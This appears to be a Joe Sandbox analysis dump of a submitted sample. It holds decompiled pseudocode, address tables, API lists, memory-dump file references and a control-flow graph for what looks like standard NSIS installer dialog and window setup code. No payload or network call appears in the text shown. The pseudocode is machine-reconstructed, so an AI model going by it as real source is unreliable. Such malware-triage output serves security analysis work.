                                                                                    							_t38 =  *0x40a39c; // 0x0
                                                                                    							__eflags = _t38 -  *0x42a284;
                                                                                    							if(_t38 ==  *0x42a284) {
                                                                                    								E0040140B(1);
                                                                                    							}
                                                                                    							__eflags =  *0x42922c - _t136;
                                                                                    							if( *0x42922c != _t136) {
                                                                                    								break;
                                                                                    							}
                                                                                    							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                                                    							if(__eflags >= 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t117 =  *(_t133 + 0x14);
                                                                                    							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                    							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                    							_push(0xfffffc19);
                                                                                    							E004045C4(_t127);
                                                                                    							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                    							_push(0xfffffc1b);
                                                                                    							E004045C4(_t127);
                                                                                    							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                    							_push(0xfffffc1a);
                                                                                    							E004045C4(_t127);
                                                                                    							_t48 = GetDlgItem(_t127, 3);
                                                                                    							__eflags =  *0x42a2ec - _t136;
                                                                                    							_v28 = _t48;
                                                                                    							if( *0x42a2ec != _t136) {
                                                                                    								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                    								__eflags = _t117;
                                                                                    							}
                                                                                    							ShowWindow(_t48, _t117 & 0x00000008);
                                                                                    							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                                                                    							E004045E6(_t117 & 0x00000002);
                                                                                    							_t118 = _t117 & 0x00000004;
                                                                                    							EnableWindow( *0x421710, _t118);
                                                                                    							__eflags = _t118 - _t136;
                                                                                    							if(_t118 == _t136) {
                                                                                    								_push(1);
                                                                                    							} else {
                                                                                    								_push(_t136);
                                                                                    							}
                                                                                    							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                                    							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                                    							__eflags =  *0x42a2ec - _t136;
                                                                                    							if( *0x42a2ec == _t136) {
                                                                                    								_push( *0x423744);
                                                                                    							} else {
                                                                                    								SendMessageW(_t127, 0x401, 2, _t136);
                                                                                    								_push( *0x421710);
                                                                                    							}
                                                                                    							E004045F9();
                                                                                    							E00406668(0x423748, E004040A6());
                                                                                    							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                    							SetWindowTextW(_t127, 0x423748);
                                                                                    							_push(_t136);
                                                                                    							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                    							__eflags = _t67;
                                                                                    							if(_t67 != 0) {
                                                                                    								continue;
                                                                                    							} else {
                                                                                    								__eflags =  *_t133 - _t136;
                                                                                    								if( *_t133 == _t136) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								__eflags =  *(_t133 + 4) - 5;
                                                                                    								if( *(_t133 + 4) != 5) {
                                                                                    									DestroyWindow( *0x429238);
                                                                                    									 *0x422720 = _t133;
                                                                                    									__eflags =  *_t133 - _t136;
                                                                                    									if( *_t133 <= _t136) {
                                                                                    										goto L60;
                                                                                    									}
                                                                                    									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                                                                    									__eflags = _t73 - _t136;
                                                                                    									 *0x429238 = _t73;
                                                                                    									if(_t73 == _t136) {
                                                                                    										goto L60;
                                                                                    									}
                                                                                    									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                    									_push(6);
                                                                                    									E004045C4(_t73);
                                                                                    									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                                    									ScreenToClient(_t127, _t137 + 0x10);
                                                                                    									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                    									_push(_t136);
                                                                                    									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                    									__eflags =  *0x42922c - _t136;
                                                                                    									if( *0x42922c != _t136) {
                                                                                    										goto L63;
                                                                                    									}
                                                                                    									ShowWindow( *0x429238, 8);
                                                                                    									E00404610(0x405);
                                                                                    									goto L60;
                                                                                    								}
                                                                                    								__eflags =  *0x42a2ec - _t136;
                                                                                    								if( *0x42a2ec != _t136) {
                                                                                    									goto L63;
                                                                                    								}
                                                                                    								__eflags =  *0x42a2e0 - _t136;
                                                                                    								if( *0x42a2e0 != _t136) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								goto L63;
                                                                                    							}
                                                                                    						}
                                                                                    						DestroyWindow( *0x429238); // executed
                                                                                    						 *0x42a268 = _t136;
                                                                                    						EndDialog(_t127,  *0x421f18);
                                                                                    						goto L60;
                                                                                    					} else {
                                                                                    						__eflags = _t34 - 1;
                                                                                    						if(_t34 != 1) {
                                                                                    							L35:
                                                                                    							__eflags =  *_t133 - _t136;
                                                                                    							if( *_t133 == _t136) {
                                                                                    								goto L63;
                                                                                    							}
                                                                                    							goto L36;
                                                                                    						}
                                                                                    						_push(0);
                                                                                    						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                    						__eflags = _t86;
                                                                                    						if(_t86 == 0) {
                                                                                    							goto L35;
                                                                                    						}
                                                                                    						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                                                    						__eflags =  *0x42922c;
                                                                                    						return 0 |  *0x42922c == 0x00000000;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t127 = _a4;
                                                                                    					_t136 = 0;
                                                                                    					if(_t130 == 0x47) {
                                                                                    						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                                                    					}
                                                                                    					_t122 = _a12;
                                                                                    					if(_t130 != 5) {
                                                                                    						L8:
                                                                                    						if(_t130 != 0x40d) {
                                                                                    							__eflags = _t130 - 0x11;
                                                                                    							if(_t130 != 0x11) {
                                                                                    								__eflags = _t130 - 0x111;
                                                                                    								if(_t130 != 0x111) {
                                                                                    									goto L28;
                                                                                    								}
                                                                                    								_t135 = _t122 & 0x0000ffff;
                                                                                    								_t128 = GetDlgItem(_t127, _t135);
                                                                                    								__eflags = _t128 - _t136;
                                                                                    								if(_t128 == _t136) {
                                                                                    									L15:
                                                                                    									__eflags = _t135 - 1;
                                                                                    									if(_t135 != 1) {
                                                                                    										__eflags = _t135 - 3;
                                                                                    										if(_t135 != 3) {
                                                                                    											_t129 = 2;
                                                                                    											__eflags = _t135 - _t129;
                                                                                    											if(_t135 != _t129) {
                                                                                    												L27:
                                                                                    												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                                                    												goto L28;
                                                                                    											}
                                                                                    											__eflags =  *0x42a2ec - _t136;
                                                                                    											if( *0x42a2ec == _t136) {
                                                                                    												_t99 = E0040140B(3);
                                                                                    												__eflags = _t99;
                                                                                    												if(_t99 != 0) {
                                                                                    													goto L28;
                                                                                    												}
                                                                                    												 *0x421f18 = 1;
                                                                                    												L23:
                                                                                    												_push(0x78);
                                                                                    												L24:
                                                                                    												E0040459D();
                                                                                    												goto L28;
                                                                                    											}
                                                                                    											E0040140B(_t129);
                                                                                    											 *0x421f18 = _t129;
                                                                                    											goto L23;
                                                                                    										}
                                                                                    										__eflags =  *0x40a39c - _t136; // 0x0
                                                                                    										if(__eflags <= 0) {
                                                                                    											goto L27;
                                                                                    										}
                                                                                    										_push(0xffffffff);
                                                                                    										goto L24;
                                                                                    									}
                                                                                    									_push(_t135);
                                                                                    									goto L24;
                                                                                    								}
                                                                                    								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                    								_t103 = IsWindowEnabled(_t128);
                                                                                    								__eflags = _t103;
                                                                                    								if(_t103 == 0) {
                                                                                    									L63:
                                                                                    									return 0;
                                                                                    								}
                                                                                    								goto L15;
                                                                                    							}
                                                                                    							SetWindowLongW(_t127, _t136, _t136);
                                                                                    							return 1;
                                                                                    						}
                                                                                    						DestroyWindow( *0x429238);
                                                                                    						 *0x429238 = _t122;
                                                                                    						L60:
                                                                                    						_t145 =  *0x425748 - _t136; // 0x0
                                                                                    						if(_t145 == 0 &&  *0x429238 != _t136) {
                                                                                    							ShowWindow(_t127, 0xa);
                                                                                    							 *0x425748 = 1;
                                                                                    						}
                                                                                    						goto L63;
                                                                                    					} else {
                                                                                    						asm("sbb eax, eax");
                                                                                    						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                                                    						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                    							L28:
                                                                                    							return E0040462B(_a8, _t122, _a16);
                                                                                    						} else {
                                                                                    							ShowWindow(_t127, 4);
                                                                                    							goto L8;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}
































                                                                                    0x004040d0
                                                                                    0x004040d7
                                                                                    0x0040423e
                                                                                    0x00404242
                                                                                    0x00404246
                                                                                    0x00404248
                                                                                    0x0040424d
                                                                                    0x00404258
                                                                                    0x00404263
                                                                                    0x00404268
                                                                                    0x0040426a
                                                                                    0x0040426c
                                                                                    0x0040426f
                                                                                    0x00404274
                                                                                    0x00404282
                                                                                    0x0040428f
                                                                                    0x00404296
                                                                                    0x00404296
                                                                                    0x00404297
                                                                                    0x00404297
                                                                                    0x0040429c
                                                                                    0x004042a2
                                                                                    0x004042a9
                                                                                    0x004042af
                                                                                    0x004042b1
                                                                                    0x004042f1
                                                                                    0x004042f6
                                                                                    0x004042fb
                                                                                    0x004042fb
                                                                                    0x00404300
                                                                                    0x00404309
                                                                                    0x0040430b
                                                                                    0x00404310
                                                                                    0x00404316
                                                                                    0x0040431a
                                                                                    0x0040431a
                                                                                    0x0040431f
                                                                                    0x00404325
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404330
                                                                                    0x00404336
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040433f
                                                                                    0x00404347
                                                                                    0x0040434c
                                                                                    0x0040434f
                                                                                    0x00404355
                                                                                    0x0040435a
                                                                                    0x0040435d
                                                                                    0x00404363
                                                                                    0x00404368
                                                                                    0x0040436b
                                                                                    0x00404371
                                                                                    0x00404379
                                                                                    0x0040437f
                                                                                    0x00404385
                                                                                    0x00404389
                                                                                    0x00404390
                                                                                    0x00404390
                                                                                    0x00404390
                                                                                    0x0040439a
                                                                                    0x004043ac
                                                                                    0x004043b8
                                                                                    0x004043bd
                                                                                    0x004043c7
                                                                                    0x004043cd
                                                                                    0x004043cf
                                                                                    0x004043d4
                                                                                    0x004043d1
                                                                                    0x004043d1
                                                                                    0x004043d1
                                                                                    0x004043e4
                                                                                    0x004043fc
                                                                                    0x004043fe
                                                                                    0x00404404
                                                                                    0x00404419
                                                                                    0x00404406
                                                                                    0x0040440f
                                                                                    0x00404411
                                                                                    0x00404411
                                                                                    0x0040441f
                                                                                    0x00404430
                                                                                    0x00404446
                                                                                    0x0040444d
                                                                                    0x00404453
                                                                                    0x00404457
                                                                                    0x0040445c
                                                                                    0x0040445e
                                                                                    0x00000000
                                                                                    0x00404464
                                                                                    0x00404464
                                                                                    0x00404466
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040446c
                                                                                    0x00404470
                                                                                    0x00404495
                                                                                    0x0040449b
                                                                                    0x004044a1
                                                                                    0x004044a3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004044c9
                                                                                    0x004044cf
                                                                                    0x004044d1
                                                                                    0x004044d6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004044dc
                                                                                    0x004044df
                                                                                    0x004044e2
                                                                                    0x004044f9
                                                                                    0x00404505
                                                                                    0x0040451e
                                                                                    0x00404524
                                                                                    0x00404528
                                                                                    0x0040452d
                                                                                    0x00404533
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040453d
                                                                                    0x00404548
                                                                                    0x00000000
                                                                                    0x00404548
                                                                                    0x00404472
                                                                                    0x00404478
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040447e
                                                                                    0x00404484
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040448a
                                                                                    0x0040445e
                                                                                    0x00404555
                                                                                    0x00404561
                                                                                    0x00404568
                                                                                    0x00000000
                                                                                    0x004042b3
                                                                                    0x004042b3
                                                                                    0x004042b6
                                                                                    0x004042e9
                                                                                    0x004042e9
                                                                                    0x004042eb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004042eb
                                                                                    0x004042b8
                                                                                    0x004042bc
                                                                                    0x004042c1
                                                                                    0x004042c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004042d3
                                                                                    0x004042db
                                                                                    0x00000000
                                                                                    0x004042e1
                                                                                    0x004040e9
                                                                                    0x004040e9
                                                                                    0x004040ed
                                                                                    0x004040f2
                                                                                    0x00404101
                                                                                    0x00404101
                                                                                    0x00404107
                                                                                    0x0040410e
                                                                                    0x00404152
                                                                                    0x00404158
                                                                                    0x00404171
                                                                                    0x00404174
                                                                                    0x00404187
                                                                                    0x0040418d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404193
                                                                                    0x0040419e
                                                                                    0x004041a0
                                                                                    0x004041a2
                                                                                    0x004041c1
                                                                                    0x004041c1
                                                                                    0x004041c4
                                                                                    0x004041c9
                                                                                    0x004041cc
                                                                                    0x004041dc
                                                                                    0x004041dd
                                                                                    0x004041df
                                                                                    0x00404215
                                                                                    0x00404225
                                                                                    0x00000000
                                                                                    0x00404225
                                                                                    0x004041e1
                                                                                    0x004041e7
                                                                                    0x00404200
                                                                                    0x00404205
                                                                                    0x00404207
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404209
                                                                                    0x004041f5
                                                                                    0x004041f5
                                                                                    0x004041f7
                                                                                    0x004041f7
                                                                                    0x00000000
                                                                                    0x004041f7
                                                                                    0x004041ea
                                                                                    0x004041ef
                                                                                    0x00000000
                                                                                    0x004041ef
                                                                                    0x004041ce
                                                                                    0x004041d4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004041d6
                                                                                    0x00000000
                                                                                    0x004041d6
                                                                                    0x004041c6
                                                                                    0x00000000
                                                                                    0x004041c6
                                                                                    0x004041ac
                                                                                    0x004041b3
                                                                                    0x004041b9
                                                                                    0x004041bb
                                                                                    0x00404591
                                                                                    0x00000000
                                                                                    0x00404591
                                                                                    0x00000000
                                                                                    0x004041bb
                                                                                    0x00404179
                                                                                    0x00000000
                                                                                    0x00404181
                                                                                    0x00404160
                                                                                    0x00404166
                                                                                    0x0040456e
                                                                                    0x0040456e
                                                                                    0x00404574
                                                                                    0x00404581
                                                                                    0x00404587
                                                                                    0x00404587
                                                                                    0x00000000
                                                                                    0x00404110
                                                                                    0x00404115
                                                                                    0x00404121
                                                                                    0x0040412a
                                                                                    0x0040422b
                                                                                    0x00000000
                                                                                    0x00404149
                                                                                    0x0040414c
                                                                                    0x00000000
                                                                                    0x0040414c
                                                                                    0x0040412a
                                                                                    0x0040410e

                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                    • ShowWindow.USER32(?), ref: 00404121
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                    • DestroyWindow.USER32 ref: 00404160
                                                                                    • SetWindowLongW.USER32 ref: 00404179
                                                                                    • GetDlgItem.USER32 ref: 00404198
                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                    • GetDlgItem.USER32 ref: 0040425E
                                                                                    • GetDlgItem.USER32 ref: 00404268
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                    • GetDlgItem.USER32 ref: 00404379
                                                                                    • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                    • EnableWindow.USER32(?,?), ref: 004043AC
                                                                                    • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                    • EnableMenuItem.USER32 ref: 004043E4
                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                    • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                    • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                    • String ID: H7B
                                                                                    • API String ID: 2475350683-2300413410
                                                                                    • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                    • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                    • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                    • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                                                    C-Code - Quality: 96%
                                                                                    			E00403D17(void* __eflags) {
                                                                                    				intOrPtr _v4;
                                                                                    				intOrPtr _v8;
                                                                                    				int _v12;
                                                                                    				void _v16;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr* _t22;
                                                                                    				void* _t30;
                                                                                    				void* _t32;
                                                                                    				int _t33;
                                                                                    				void* _t36;
                                                                                    				int _t39;
                                                                                    				int _t40;
                                                                                    				int _t44;
                                                                                    				short _t63;
                                                                                    				WCHAR* _t65;
                                                                                    				signed char _t69;
                                                                                    				WCHAR* _t76;
                                                                                    				intOrPtr _t82;
                                                                                    				WCHAR* _t87;
                                                                                    
                                                                                    				_t82 =  *0x42a270;
                                                                                    				_t22 = E00406A35(2);
                                                                                    				_t90 = _t22;
                                                                                    				if(_t22 == 0) {
                                                                                    					_t76 = 0x423748;
                                                                                    					L"1033" = 0x30;
                                                                                    					 *0x437002 = 0x78;
                                                                                    					 *0x437004 = 0;
                                                                                    					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                                                    					__eflags =  *0x423748;
                                                                                    					if(__eflags == 0) {
                                                                                    						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                                                    					}
                                                                                    					lstrcatW(L"1033", _t76);
                                                                                    				} else {
                                                                                    					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                                                    				}
                                                                                    				E00403FED(_t78, _t90);
                                                                                    				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
                                                                                    				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                                                    				 *0x42a2fc = 0x10000;
                                                                                    				if(E0040603F(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                                                                    					L16:
                                                                                    					if(E0040603F(_t98, _t86) == 0) {
                                                                                    						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                    					}
                                                                                    					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                    					 *0x429248 = _t30;
                                                                                    					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                    						L21:
                                                                                    						if(E0040140B(0) == 0) {
                                                                                    							_t32 = E00403FED(_t78, __eflags);
                                                                                    							__eflags =  *0x42a300;
                                                                                    							if( *0x42a300 != 0) {
                                                                                    								_t33 = E0040579D(_t32, 0);
                                                                                    								__eflags = _t33;
                                                                                    								if(_t33 == 0) {
                                                                                    									E0040140B(1);
                                                                                    									goto L33;
                                                                                    								}
                                                                                    								__eflags =  *0x42922c;
                                                                                    								if( *0x42922c == 0) {
                                                                                    									E0040140B(2);
                                                                                    								}
                                                                                    								goto L22;
                                                                                    							}
                                                                                    							ShowWindow( *0x423728, 5); // executed
                                                                                    							_t39 = E004069C5("RichEd20"); // executed
                                                                                    							__eflags = _t39;
                                                                                    							if(_t39 == 0) {
                                                                                    								E004069C5("RichEd32");
                                                                                    							}
                                                                                    							_t87 = L"RichEdit20W";
                                                                                    							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                                                    							__eflags = _t40;
                                                                                    							if(_t40 == 0) {
                                                                                    								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                                                    								 *0x429224 = _t87;
                                                                                    								RegisterClassW(0x429200);
                                                                                    							}
                                                                                    							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                                                    							E00403C67(E0040140B(5), 1);
                                                                                    							return _t44;
                                                                                    						}
                                                                                    						L22:
                                                                                    						_t36 = 2;
                                                                                    						return _t36;
                                                                                    					} else {
                                                                                    						_t78 =  *0x42a260;
                                                                                    						 *0x429204 = E00401000;
                                                                                    						 *0x429210 =  *0x42a260;
                                                                                    						 *0x429214 = _t30;
                                                                                    						 *0x429224 = 0x40a3b4;
                                                                                    						if(RegisterClassW(0x429200) == 0) {
                                                                                    							L33:
                                                                                    							__eflags = 0;
                                                                                    							return 0;
                                                                                    						}
                                                                                    						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                    						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                                                    						goto L21;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t78 =  *(_t82 + 0x48);
                                                                                    					_t92 = _t78;
                                                                                    					if(_t78 == 0) {
                                                                                    						goto L16;
                                                                                    					}
                                                                                    					_t76 = 0x428200;
                                                                                    					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                                                    					_t63 =  *0x428200; // 0x22
                                                                                    					if(_t63 == 0) {
                                                                                    						goto L16;
                                                                                    					}
                                                                                    					if(_t63 == 0x22) {
                                                                                    						_t76 = 0x428202;
                                                                                    						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                                                    					}
                                                                                    					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                    					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                    						L15:
                                                                                    						E00406668(_t86, E00405F37(_t76));
                                                                                    						goto L16;
                                                                                    					} else {
                                                                                    						_t69 = GetFileAttributesW(_t76);
                                                                                    						if(_t69 == 0xffffffff) {
                                                                                    							L14:
                                                                                    							E00405F83(_t76);
                                                                                    							goto L15;
                                                                                    						}
                                                                                    						_t98 = _t69 & 0x00000010;
                                                                                    						if((_t69 & 0x00000010) != 0) {
                                                                                    							goto L15;
                                                                                    						}
                                                                                    						goto L14;
                                                                                    					}
                                                                                    				}
                                                                                    			}
























                                                                                    0x00403d1d
                                                                                    0x00403d26
                                                                                    0x00403d2d
                                                                                    0x00403d2f
                                                                                    0x00403d43
                                                                                    0x00403d55
                                                                                    0x00403d5e
                                                                                    0x00403d67
                                                                                    0x00403d6e
                                                                                    0x00403d73
                                                                                    0x00403d7a
                                                                                    0x00403d8d
                                                                                    0x00403d8d
                                                                                    0x00403d98
                                                                                    0x00403d31
                                                                                    0x00403d3c
                                                                                    0x00403d3c
                                                                                    0x00403d9d
                                                                                    0x00403da7
                                                                                    0x00403db0
                                                                                    0x00403db5
                                                                                    0x00403dc6
                                                                                    0x00403e58
                                                                                    0x00403e60
                                                                                    0x00403e69
                                                                                    0x00403e69
                                                                                    0x00403e7f
                                                                                    0x00403e85
                                                                                    0x00403e93
                                                                                    0x00403f14
                                                                                    0x00403f1c
                                                                                    0x00403f26
                                                                                    0x00403f2b
                                                                                    0x00403f31
                                                                                    0x00403fbb
                                                                                    0x00403fc0
                                                                                    0x00403fc2
                                                                                    0x00403fde
                                                                                    0x00000000
                                                                                    0x00403fde
                                                                                    0x00403fc4
                                                                                    0x00403fca
                                                                                    0x00403fd2
                                                                                    0x00403fd2
                                                                                    0x00000000
                                                                                    0x00403fca
                                                                                    0x00403f3f
                                                                                    0x00403f4a
                                                                                    0x00403f4f
                                                                                    0x00403f51
                                                                                    0x00403f58
                                                                                    0x00403f58
                                                                                    0x00403f63
                                                                                    0x00403f6b
                                                                                    0x00403f6d
                                                                                    0x00403f6f
                                                                                    0x00403f78
                                                                                    0x00403f7b
                                                                                    0x00403f81
                                                                                    0x00403f81
                                                                                    0x00403fa0
                                                                                    0x00403fb1
                                                                                    0x00000000
                                                                                    0x00403fb6
                                                                                    0x00403f1e
                                                                                    0x00403f20
                                                                                    0x00000000
                                                                                    0x00403e95
                                                                                    0x00403e95
                                                                                    0x00403ea1
                                                                                    0x00403eab
                                                                                    0x00403eb1
                                                                                    0x00403eb6
                                                                                    0x00403ec5
                                                                                    0x00403fe3
                                                                                    0x00403fe3
                                                                                    0x00000000
                                                                                    0x00403fe3
                                                                                    0x00403ed4
                                                                                    0x00403f0f
                                                                                    0x00000000
                                                                                    0x00403f0f
                                                                                    0x00403dcc
                                                                                    0x00403dcc
                                                                                    0x00403dcf
                                                                                    0x00403dd1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403ddf
                                                                                    0x00403df1
                                                                                    0x00403df6
                                                                                    0x00403dff
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403e05
                                                                                    0x00403e07
                                                                                    0x00403e14
                                                                                    0x00403e14
                                                                                    0x00403e1d
                                                                                    0x00403e23
                                                                                    0x00403e4b
                                                                                    0x00403e53
                                                                                    0x00000000
                                                                                    0x00403e35
                                                                                    0x00403e36
                                                                                    0x00403e3f
                                                                                    0x00403e45
                                                                                    0x00403e46
                                                                                    0x00000000
                                                                                    0x00403e46
                                                                                    0x00403e41
                                                                                    0x00403e43
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403e43
                                                                                    0x00403e23

                                                                                    APIs
